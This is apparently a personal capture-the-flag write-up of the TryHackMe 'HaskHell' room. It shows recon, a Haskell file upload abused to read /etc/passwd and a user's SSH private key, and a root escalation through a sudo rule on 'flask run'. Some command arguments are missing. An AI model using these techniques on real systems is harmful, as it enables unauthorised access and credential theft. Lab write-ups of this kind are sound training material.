Show your professor that his PhD isn’t in security. Not much to go on there. Haskell is a programming language that I don’t know anything about. Let’s go!


nmap says we’ve got 22 (SSH) and 5001, which is a non-standard port.

5001/tcp open http syn-ack ttl 63 Gunicorn 19.7.1

Gunicorn is a ‘Python Web Server Gateway Interface HTTP server’ according to Wikipeda.


Visting shows we have a webserver running on this port, to do with Functional Programming 220. There is a link to /homework1 which contains some instructions, and assigned work is supposed to be submitted to /upload. The upload function supposedly accepts Haskell files only. Unfortunately, the linked /upload returns a 404.

It also says that Your file will be compiled and ran and all output will be piped to a file under the uploads directory.


root@kali:/opt/tryhackme/haskhell# gobuster dir -u -w /usr/share/dirb/wordlists/common.txt

Running dirbuster with the common wordlist reveals a page called /submit, and that appears to be what the /upload was supposed to be.

Creating a valid haskell file (hello, world of course!), we can upload it:

module Main
main=putStrLn “Hello, World!”

And actually it gets shown to us:

[1 of 1] Compiling Main ( /home/flask/uploads/fib.hs, /home/flask/uploads/fib.o ) Linking /home/flask/uploads/fib …
Hello, World!

So, what can we do with that??

Well, we can read a file for a start:

main = do
s <- readFile “/etc/passwd”
doSomethingWith s
doSomethingWith :: String -> IO ()
doSomethingWith str = putStrLn str


Unfortunately we can’t open /etc/shadow :)

We can do some guessing - first I tried /home/prof/.profile, and that worked … so what if we try /home/prof/.ssh/id_rsa? Bingo!


I won’t paste it here, but we’ve got the private key for ‘prof’ and once we chmod 600 on it we can login:

root@kali:/opt/tryhackme/haskhell# ssh -i id_rsa prof@ Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

Prof has the user flag, so that’s sweet.

Running sudo -l, prof can do:

User prof may run the following commands on haskhell:
(root) NOPASSWD: /usr/bin/flask run


Flask is a micro web framework written in Python, so let’s make the most super basic Python thing you can imagine:

prof@haskhell:/root# cat /dev/shm/
import os

Now this isn’t a flask app, but it doesn’t matter. Next, we set our environment variable:

$ export

And we do this:

prof@haskhell:/dev/shm$ sudo /usr/bin/flask run
root@haskhell:/dev/shm# whoami

Boom. I had so little trouble with this I feel like I must’ve cheated by guessing the presence of id_rsa, and I didn’t consult any walkthroughs. Maybe I’m just levelling up.